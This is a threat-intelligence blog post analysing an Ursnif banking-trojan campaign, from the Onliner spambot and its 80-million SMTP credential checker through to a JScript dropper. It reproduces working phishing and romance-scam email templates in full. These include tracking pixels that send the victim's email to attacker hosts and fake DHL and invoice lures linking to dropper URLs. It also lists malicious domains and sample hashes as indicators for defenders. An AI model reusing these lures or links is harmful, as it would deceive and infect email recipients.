A journey inside Ursnif campaign

Ursnif is a well known bankin trojan. In this blogpost, I'll try to take a look deeper at a recent campaign for understanding how that works.

@dhlexpressuk #phishing
Subj:DHL Italy - documenti importanti
File:HK5863.js
MD5:f356cb644971384240e05a5d22cd149f
VT:4/50@malwrhunterteam pic.twitter.com/hNWULLHwq0

— guga (@illegalFawn) 7 novembre 2016

Let's try to understand all the chain of infection from spambot to Ursnif dropper.

The spambot - Onliner

This Ursnif campaign is based on a SpamBot called "Onliner". As we can see in the C&C Panel, this spambot has 2 main features:

• Checker: You provide a list of compromised smtp accounts to the spambot and some bots test if credentials are valids.
  

I've found around 80 millions compromised SMTP accounts on the checker module. Some of them come from public leaks (like badoo, linkedin...) and some other come from unknown sources.

• Mailer: The spam mailer:
  
  Mailer requests details: //Статусы ошибок ОТВЕТА СЕРВЕРА //-1 Бот заблокирован по IP //-2 Нет активной рассылки //-3 Данного бота нет! в списке активных (должно срабатывать толлько при чей-либо попытке подделать запрос). //-4 Нет аккаунтов //-5 Не удалось загрузить ssl библиотеку //-6 Бот прислал статус ошибки (Какую либо) //-7 Прошлый статус у бота не Done, новую рассылку получить нельзя //-8 Бот заблокирован по количеству онлайн работающих ботов //-9 Бот заблокирован по стране //-10 В таблице нет индексов. (Такого быть не должно! Нулевой индекс есть всегда(смещение от старта)) //-11 Нет больше блоков //Статусы ошибок ЗАПРОСА БОТА //-1 Блокировка по таймауту 6 минут (не удалось отправить ни одного письма за 6 минут) //-2 Ошибка загрузки базы получателя //-3 Нет папки для загрузки zip архива с заданием //-4 Не удалось загрузить списо аккаунтов //-6 Блокировка по таймауту Google translate: // Server errors status     // - 1 Bot blocked by IP     // - 2 No active mailing     // - 3 This bot is not in the active list (someone else's attempt to forge a request).     // - 4 No accounts     // - 5 Could not load ssl library     // - 6 Bot sent error status (or What)     // - 7 Last status bot not Done, a new e-mail can not be obtained     // - 8 Bot locked by the number of working bots online     // - 9 Bot locked by country     // - 10 The table does not have indexes. (This should not be! Zero index is always (the offset from the start))     // - 11 No more blocks     // Bot requests errors status     // - 1 lock timeout 6 minutes (could not send a single emails in 6 minutes)     // - 2 base recipient Error loading     // - 3 No folder to download the zip file with the job     // - 4 Unable to load record to the population accounts     // - 6 Lock timeout

If we look at the changelog, this spambot seems to be quite young:

As we can see in the PHP source code, it seems that a SMTPBruteForcer exists:

Ursnif spam

Fingerprinting campaign

Let's focus on Ursnif campaign. This campaign is quite interesting. First of all, botmaster(s) starts by a fingerprinting round.
They send some random emails with a hidden image inside:
<IMG width=1 height=1 src="http://conceptcreationnv.com/2015/cgi-bin/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}" alt="mobile"> Hello, Champ {friend|champion\enthusiast}! How {are you|is your day}? {My name is|I'm} Natalia. Do you believe in {fate|destiny}? Love is inseparable fellow of hope. {Sorry for|Pardon} my English, but I hope you'll {understand|get} that I let my {passion|flame} speak for me. I wish you realize that it's not just some words - it's a faith that lies within my soul. I hope you won't leave it at just {cursory reading|skimming} of the letter, and will {see|recognize} my true feelings behind it. It like I'm sending you {piece|part} of my soul. It's really important to me! Because I'm looking for a serious man who's ready to build {meaningful|committed} {relationship|partnership}. I wanna go {on|through} a journey from a beautiful bride to a caring mother. I dream to meet {an honest|a sincere} man, who will take me to {mysterious|secret} {places|lands} and show me a whole new world. Don't give me your sympathy, give your feelings instead! I hope to see {through|in} your {response|answer} that your interest in me has a depth. Eagerly awaiting for your {letter|message} and {photos|pictures}! Bye-bye!
When a victim open this email, some information are leaked to "http://conceptcreationnv.com/2015/cgi-bin/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}". These information (User Agent, IP etc) are usefull for the botmaster because he can indentify specifics groups of users (Windows users for example).
The script used for victims classification:

Output for Windows users:

This spam campaign is maybe used for tests purpose or for target identification.

Ursnif campaign

After the fingerprinting campaign, the spambot is used for spreading a dropper which leads to Ursnif.
This JScript dropper is spread via fake invoices;
Some example of spams templates used during the campaign:
DHL invoce: <IMG width=1 height=1 src="http://conceptcreationnv.com/2015/cgi-bin/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}" alt="DHL"><br> <img class="logo" alt="Track DHL Express Shipments" src="http://www.dhl.com/img/meta/dhl_logo.gif" height="48" width="171"><br><br> Gentile cliente {email2} <br><br> Notifica, numero di consegna 1{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}<br> <h2><center><a href="https://docs.google.com/uc?id=0B-a13vsWk4EYRHY1Q2xGZTQ2N0U"> documento stampa</a><center></h2><br> <sup style="color: #ffffff;">#FILE2</sup><br><br> Numero d'ordine: {1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}0{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}0{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}<br> ----------------------------------------------------------<br><br> DHL Supply Chain (Italy) S.p.A.<br> Sede Legale: Settala, (MI) viale delle industrie 2.<br> Capitale sociale: Euro 1.548.000,00 diviso in n. 300.000 azioni da Euro 5,16 cad.- versato Euro 1.548.000,00<br><br> Soci: DHL Holding (Italy) S.r.l. (100%)<br> Codice Fiscale/Registro Imprese: 00718630155<br> R.E.A.: MI-618656<br> Data di costituzione: 18/12/1962<br> <small style="color: #ffffff;">#FILE1</small><br>

Insurance invoce: <IMG width=1 height=1 src="http://conceptcreationnv.com/2015/cgi-bin/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}" alt="ILOMA"><br> <img class="logo" alt="ILOMA SRL" src="http://evi-verein.at/templates/css/logoIloma.png" height="48" width="171"><br><br> Gentile Cliente {email2}<br><br> Con la presente Vi chiediamo informazioni circa il pagamento 1{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9} euro relativo alle nostre fatture indicate in oggetto.<br><br> <h2><center><a href="http://www.diamondfitness.hu/css/294DHL.php"> INFORMAZIONI DETTAGLIATE</a><center></h2><br> Vi ricordiamo che alla sistemazione delle nostre competenze seguira il rimborso della liquidazione da parte della Compagnia Assicuratrice.<br><br> Cordiali saluti<br> -------------------------------------------------------<br> support@iloma.it<br> cell. +39 328 4975254<br><br> visita il sito www.iloma.it<br><br> ILOMA srl<br> sede legale: Via Coni Zugna, 71 20144 Milano<br> sede operativa: Via Garibaldi, 38 44121 Ferrara<br> telefono 0532.240112 - fax 0532.215377<br> P.IVA e C.F. 08522860967<br> -------------------------------------------------------<br> Ricordiamo che ai sensi della legge sulla privacy, nessuno puo leggere e/o visualizzare il presente messaggio, tranne il destinatario; comunque in caso di erronea ricezione, Vi preghiamo di provvedere alla distruzione dello stesso, compreso eventuali allegati

Spam targeting Hotel:
Hello {email2}.<br><br> There were difficulties with the registration of rooms at the hotel!<br> Some of the documents were written in error.<br><br> Please check our documents, all right now?<br><br> Thank you!<br>
Fake invoice <IMG width=1 height=1 src="http://{wedarenda.ru|wecanall.ru|webslike.ru|webroyal-demo.ru|webowltest.ru|wayorganic.ru|wattpoint.ru|watchbaza.ru|wapseduction.ru|walltowall.ru|yogurt-land.su|yogurtland.su|vvaz.ru|vtormetgrup.ru|vstr.su|vsrp-samp.ru|vsevservis.ru|vsevenglishhome.ru|vse-kedz.ru|vsekedz.ru|vse-keds.ru|vsekeds.ru|vse-kedi.ru|vsekedi.ru|vsegdaskidki.ru|vseagro.ru|vrline.ru|vrbox63.ru|vprtfl.ru|vozdushnii-syurpriz.ru|vottakda.ru|vota.ru|voshodnews.ru|vorota-doorhan39.ru|volttek.ru|voltea.ru|volinrok.ru|vojnageroev.ru|vodver.ru|vodrus.ru|vodoemclub.ru|vodo-econom.ru|voder24.ru|vodacrimea.ru|vnovdesign.ru|vl-tur.ru|vlovke.ru|vlevkin.ru|vlcustom.ru|vlad-pvh.ru|vkysnayeda.ru|vkverifed.ru|vk-verif.ru|vkusnyj-zavtrak.ru|vkusnyj-uzhin.ru|vkusnye-obedy.ru|vkuseka.ru|vkremain.ru|vkrecovri.ru|vkrecovery.ru}/m/a/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}" alt="Marconigomma"><br> Buon giorno {email2}<br><br> In allegato vs. offerta controfirmata, prego prendere nota della correzione alla rag. Sociale della societa'.<br> NB: servono entrambi gli isolanti, piu' la resistenza.<br> Il corriere e GLS , prego avvisare quando materiale pronto per organizzare il ritiro.<br> Le fatture vanno indirizzate come di seguito riportato:<br><br> <h2><center><a href="http://icrem.it/css/SRL_6849.php"> documento stampa</a><center></h2><br> Ufficio Amministrazione<br> Marconigomma SPA con socio unico<br> Via dell'Europa 28 - 40037 Sasso Marconi (BO) tel. +39 051 841316 fax +39 051 6750157 - 6752016<br><br> Cordialmente<br> RGS-Coordinamento Manutenzione<br><br> Tel. 051 841316 - Fax 051 6750157<br> -----------------------<br> Marconigomma Group SPA<br> Via dell Europa, 28 - 40037 Sasso Marconi BO - C.F./P.IVA/Reg. Imp. 02123801207 - Capitale Sociale 200.430,00 i.v. - REA BO-415402
The first stage is a dropper in JScript - fattura_93785849.js:

The JScript tries to contact www.xxxxxx.xxx/r4.php. r4.php return another JScript code. This is the main component:

eval(r4.php?cmd=d) returns another JScript used for "Drop and Launch" Ursnif. This script can be in 7 differents form:

• bitsadmin_dll
• bitsadmin_exe
• js_dll
• js_exe
• js_exe_notepad
• powershell_dll
• powershell_exe

This dropper is fully in JScript \o/
The C&C part is open, it's possible to retrieves some statistics:

Big picture of this JSDropper:

I've seen some switch between JSDropper and doc+macro during some times (https://www.virustotal.com/fr/url/6c8d675e5a2dd055ce54aa0bea80465a128dff5f3da6ddb01ae9a89ed24ff129/analysis/)
It's look like Ursnif campaigns are not a so big deal...

Annexes

Spambot

• spambot.exe - b5c87cab2ff99d1e4b4c3ee897b07869fa8f6a63fbd27018f589c105faf91fcd
• CheckerSMTPv5.dll - 1cae16cb11c32aaa0cb190189d88811288e06df7cccda6473409de3ea5c7b633
• MailerSMTPv6.dll - 026df17589f9854a34a49ac097c5f8e3b99473c61e853be18050d458ae20113b
• Full list of r4.php - https://pastebin.com/fht6G6pe
• r4.php - https://pastebin.com/fxLvrM06

Ursnif samples

• 6b15aa3f3d6bb1c308974fc87bd38ceb2ee337fd3495ebe6c6e7157a85e914cb
• 14b05f0bd0ca6e169a8d4be542a4165c4266a0419c1d0d857b98b4d84619bdf7
• 4f3f957334bcbde8462f9215fd20d6fd6363c449e07bbf49f30428399c9f6e57
• 9f298cee96c9de4ff85524f99fc34db3a11726ddd8c4fcdf8e2d79ef13437057
• fd11e035295639b19dfe418514c91159b3f50ea8dc350c36b63a9363e52f4533
• d843403b871a353020bffdedd9c4905e34ed195c1222c3bfd3567c97eb4f69a4
• a194d0ef0d27bd07ec22bb4ebc739847c589b4307603b6d65cf1f3fbdd19f6cd
• d4b2377c5f9af91cc693fce967f3049ab4c6ec75c162276b584002946203a770

OTX - https://otx.alienvault.com/pulse/5851b5d287d2d95d361dd743/